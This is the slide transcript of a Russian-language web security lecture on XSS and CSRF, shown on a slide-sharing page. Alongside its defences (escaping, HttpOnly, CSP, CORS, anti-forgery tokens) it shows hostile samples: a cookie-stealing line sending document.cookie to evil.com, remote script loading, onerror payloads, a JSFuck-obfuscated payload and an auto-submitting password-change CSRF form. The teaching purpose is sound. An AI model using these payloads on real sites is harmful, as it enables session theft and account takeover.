Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Шпора.Безопасность

Sponsored · SiteGround - Reliable hosting with speed, security, and support you can count on.
Avatar for ar7z1 ar7z1
March 27, 2016
Programming
1
73

 Шпора.Безопасность

Avatar for ar7z1

ar7z1

March 27, 2016
Tweet

More Decks by ar7z1

See All by ar7z1
XSS & CSRF 2.0
Avatar for ar7z1 ar7z1
0
110
HappyDev 2015
Avatar for ar7z1 ar7z1
0
96
XSS&CSRF
Avatar for ar7z1 ar7z1
0
130

Other Decks in Programming

See All in Programming
CSC307 Lecture 02
Avatar for Javier Gonzalez-Sanchez javiergs
PRO
1
780
生成AIを使ったコードレビューで定性的に品質カバー
Avatar for Chiaki Okamoto chiilog
1
270
2026年 エンジニアリング自己学習法
Avatar for yumechi(Motoki Hirao) yumechi
0
140
Patterns of Patterns
Avatar for Denys Poltorak denyspoltorak
0
1.4k
ぼくの開発環境2026
Avatar for yuzneri yuzneri
0
240
「ブロックテーマでは再現できない」は本当か?
Avatar for Takashi Kitajima inc2734
0
1k
The Past, Present, and Future of Enterprise Java
Avatar for ivargrimstad ivargrimstad
0
590
Package Management Learnings from Homebrew
Avatar for Mike McQuaid mikemcquaid
0
230
CSC307 Lecture 09
Avatar for Javier Gonzalez-Sanchez javiergs
PRO
1
840
IFSによる形状設計/デモシーンの魅力 @ 慶應大学SFC
Avatar for がむ gam0022
1
310
AI巻き込み型コードレビューのススメ
Avatar for Nealle nealle
2
420
フロントエンド開発の勘所 -複数事業を経験して見えた判断軸の違い-
Avatar for Yoichiro Kubo heimusu
7
2.8k

Featured

See All Featured
The MySQL Ecosystem @ GitHub 2015
Avatar for Sam Lambert samlambert
251
13k
Java REST API Framework Comparison - PWX 2021
Avatar for Matt Raible mraible
34
9.1k
A brief & incomplete history of 
UX Design for the World Wide Web: 1989–2019
Avatar for Jason CranfordTeague jct
1
300
End of SEO as We Know It (SMX Advanced Version)
Avatar for Michael King ipullrank
3
3.9k
AI Search: Implications for SEO and How to Move Forward - #ShenzhenSEOConference
Avatar for Aleyda Solis aleyda
1
1.1k
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
Avatar for Aleyda Solis aleyda
1
1.9k
Building a Modern Day 
E-commerce SEO Strategy
Avatar for Aleyda Solis aleyda
45
8.7k
The Cost Of JavaScript in 2023
Avatar for Addy Osmani addyosmani
55
9.5k
Ruling the World: When Life Gets Gamed
Avatar for Sebastian Deterding codingconduct
0
140
Measuring & Analyzing Core Web Vitals
Avatar for Philip Tellis bluesmoon
9
750
GraphQLとの向き合い方2022年版
Avatar for Yosuke Kurami quramy
50
14k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
Avatar for Joe Casabona jcasabona
34
2.6k

Transcript

  1. Security Зиненко Артем [email protected]

  2. XSS CSRF

  3. Cross Site Scripting

  4. None

  5. @if (Model.UserQuery != null) { <div>По запросу &laquo; <b>@Html.Raw(Model.UserQuery)</b> &raquo;

    ничего не найдено.</div> }
  6. None
  7. None
  8. None

  9. document.write( '<img src="http:// evil.com/' + document.cookie + '">');

  10. Same Origin Policy

  11. window.location.href = “https:// online.sbeerbank.com”;

  12. document.write('<script src=https://pastebin.com/ raw/tvLXq0G9><\/script>')

  13. None
  14. None

  15. Какие бывают?

  16. Reflected

  17. None

  18. http://site.com/ search? q=<script>…</ script>

  19. Stored

  20. None

  21. <img src="x" onerror=“…”>

  22. DOM-based

  23. None

  24. http://site.com/ search#'><img src=x onerror=…>

  25. http://candy-web- security.apphb.com XSS

  26. https://xss- game.appspot .com

  27. Защита

  28. Preventing XSS (Google) https://goo.gl/6O42ey

  29. HttpOnly cookie

  30. Set-Cookie: qqq=lalala; HttpOnly

  31. None

  32. OWASP XSS Filter Evasion Cheat Sheet https://goo.gl/lyQiI

  33. jsfuck.com

  34. [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+! +[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+ []]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) [!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+ [])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([! []]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+ (!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+ ([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+ (!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+ [][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!!

    []+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]] +(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+ [+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+ []+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]] ((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+ []]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+ ([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+ []]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+ [+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+ [+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+ []+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

  35. Экранируй все

  36. <script>...</script> &lt;script&gt;...&lt; /script&gt;

  37. innerHTML document.write eval @Html.Raw(…)

  38. X-XSS-Protection

  39. X-XSS- Protection: 1

  40. X-XSS- Protection: 0

  41. X-XSS- Protection: 1; mode=block

  42. https://github.com/ ar7z1/cws/ XssController.Level1

  43. Content-Security-Policy X-Content-Security- Policy X-WebKit-CSP

  44. Content-Security- Policy: default-src ‘self’ https:// cdn.example.com <script src=“//cdn.example.com/ script.js”></script>

  45. None

  46. <script> //какой-то javascript </script>

  47. Content-Security- Policy: script-src ‘self’ unsafe-inline https:// cdn.example.com

  48. Content-Security-Policy: script- src ‘self’ ‘nonce-EDNnf03n…’ <script nonce=EDNnf03n...> //какой-то javascript </script>

  49. Content-Security-Policy: script- src ‘sha256- qznLcsROx4GACP2dm0UCKCzCG +HiZ1guq6ZZDob/Tng=’ <script>alert('Hello, world.');</script>

  50. None

  51. echo -n "alert('Hello, world.’);" | openssl dgst -sha256 -binary |

    openssl enc -base64

  52. eval() new Function() setTimeout([string], …) setInterval([string], …) ‘unsafe-eval’

  53. report-uri /…;

  54. { "csp-report": { "document-uri": "http://example.org/ page.html", "referrer": "http://evil.example.com/ haxor.html", "blocked-uri":

    "http:// evil.example.com/image.png", "violated-directive": "default-src 'self'", "effective-directive": "img-src", "original-policy": "default-src 'self'; report-uri http://example.org/csp- report.cgi" } }

  55. Content- Security-Policy- Report-Only: script-src 'self'; ...; report-uri /uri;

  56. https://github.com/ ar7z1/cws/ XssController.Level2

  57. <system.web> <httpRuntime requestValidationMode="4.0" /> </system.web> <system.web> <pages validateRequest="true" /> </system.web>

  58. Ссылки • Candy Web Security GitHub • HttpOnly • Request

    Validation in ASP.NET • Using Content Security Policy • Content Security Policy Level 2 • Cross-site scripting от Google • OWASP Top 10 for .NET developers part 2: Cross-Site Scripting (XSS) • Understanding XSS – input sanitisation semantics and output encoding contexts • How to break your site with a content security policy: an illustrated example • troyhunt.com

  59. Cross Site Request FORGERY

  60. None

  61. GET /index.html

  62. GET /index.html

  63. GET /index.html GET /image.png

  64. GET /index.html GET /image.png

  65. CROSS DOMAIN REQUESTS

  66. site.com

  67. site.com GET /emails gmail.com

  68. site.com GET /emails gmail.com

  69. Same Origin Policy

  70. protocol://host:port

  71. https://site.com http://site.com https://a.site.com https://site.com:9090

  72. CROSS ORIGIN RESOURCE SHARING

  73. GET HEAD POST METHODS

  74. Accept Accept-Language Content-Language Content-Type HEADERS

  75. application/x-www- form-urlencoded multipart/form- data text/plain CONTENT-TYPE

  76. var r = new XMLHttpRequest(); r.open('GET', ‘http://site2.com’, true); r.send();

  77. GET / HTTP/1.1 Host: site2.com Origin: http://site1.com/

  78. HTTP/1.1 200 OK Access-Control- Allow-Origin: http://site1.com [Data]

  79. var r = new XMLHttpRequest(); r.open('GET', ‘http:// site2.com’, true); r.withCredentials

    = true; r.send();

  80. GET / HTTP/1.1 Host: site2.com Origin: http://site1.com/ Cookie: token=ab7…

  81. HTTP/1.1 200 OK Access-Control-Allow- Origin: http:// site1.com Access-Control-Allow- Credentials: true

    [Data]

  82. PREFLIGHTED REQUESTS

  83. var r = new XMLHttpRequest(); r.open('POST', ‘http:// site2.com’, true); r.setRequestHeader(‘Content-

    Type’,'application/json'); r.setRequestHeader('X-HEADER', 'lalala'); r.send(data);

  84. OPTIONS / HTTP/1.1 Host: site2.com Origin: http://site1.com/ Access-Control-Request- Method: POST

    Access-Control-Request- Headers: X-HEADER

  85. HTTP/1.1 200 OK Access-Control-Allow-Origin: http://site1.com Access-Control-Allow- Methods: POST, GET, OPTIONS

    Access-Control-Allow- Headers: X-HEADER

  86. POST / HTTP/1.1 Host: site2.com Origin: http://site1.com/ X-HEADER: lalala Content-Type:

    application/json [Data]

  87. HTTP/1.1 200 OK Access-Control- Allow-Origin: http://site1.com [Data]

  88. None

  89. Cross-origin reads var r = new XMLHttpRequest(); r.open('GET', ‘http:// site2.com’,

    true); r.withCredentials = true; r.send();

  90. Cross-origin writes var c = new XMLHttpRequest(); c.withCredentials = true;

    c.open("POST", ...); c.setRequestHeader("Content- Type", “...”); c.send(...);

  91. Cross-origin embedding $(‘…’).append( ‘<img src=“…”>’ );

  92. Bad CORS

  93. Access-Control- Allow-Origin: * Access-Control- Allow- Credentials: true

  94. CHANGE PASSWORD

  95. None

  96. POST /profile password:78330… retypedPassword:2c84…

  97. None
  98. None

  99. GET evil.com

  100. GET evil.com

  101. <form method=“POST” action=“http:// service.com/profile”> <input type=“hidden” name=“password” value=“78330…” /> <input

    type=“hidden” name=“retypedPassword” value=“2c84…” /> </form>

  102. <form method=“POST” action=“http://service.com/profile”> <input type=“hidden” name=“password” value=“78330…”/> <input type=“hidden” name=“retypedPassword”

    value=“2c84…”/> </form>

  103. <script> window.onload = function(){ … form.submit(); } </script>

  104. POST /profile password, retypedPassword GET evil.com

  105. HACKED

  106. http://candy-web- security.apphb.com CSRF

  107. <!DOCTYPE html> <html> <head> <title>CSRF</title> </head> <body> <form method="post" action=“...”>

    ... </form> </body> </html>

  108. CSRF PROTECTION

  109. Короткоживущие cookie

  110. REFERER

  111. GET /changePassword HTTP/1.1 Host: site.com Origin: evil.com Referer: http://evil.com/ evilPage

  112. site.com vs. site.com.attacker.com

  113. CAPTCHA

  114. None
  115. None
  116. None

  117. CSRF TOKEN

  118. None

  119. GET /page

  120. <%= Html.AntiForgeryToken() %> @Html.AntiForgeryToken()

  121. <input type=“hidden” name=“__RequestVerifica tionToken” value=“6fGBtLZmVBZ59oUa d1Fr33BuPxANKY8[...]”/>

  122. GET /profile

  123. GET /profile

  124. [ValidateAnti ForgeryToken]

  125. None

  126. AntiForgery .GetTokens( string oldCookieToken, out string newCookieToken, out string formToken)

  127. $.ajax("/api/...", { type: "POST", contentType: "application/json", data: JSON.stringify(...), dataType: "json",

    headers: { "X-CSRF-Token": "…" } });

  128. public override void OnActionExecuting (HttpActionContext actionContext) { actionContext.Request.Headers.TryGetValues( "X-CSRF-Token", out

    tokenHeaders) ... actionContext.Request.Headers.GetCookies( “CSRF-Cookie") ... AntiForgery.Validate(cookieToken, formToken);

  129. https://github.com/ ar7z1/cws/ CsrfController.Level1

  130. Ссылки • Same Origin Policy • CORS • CSRF Prevention

    Cheat Sheet • Preventing CSRF Attacks in ASP.NET Web API • Anatomy of a Cross-site Request Forgery Attack • Preventing CSRF With Ajax • CSRF Attacks and Web Forms • haacked.com
  131. None

  132. @troyhunt

  133. [email protected]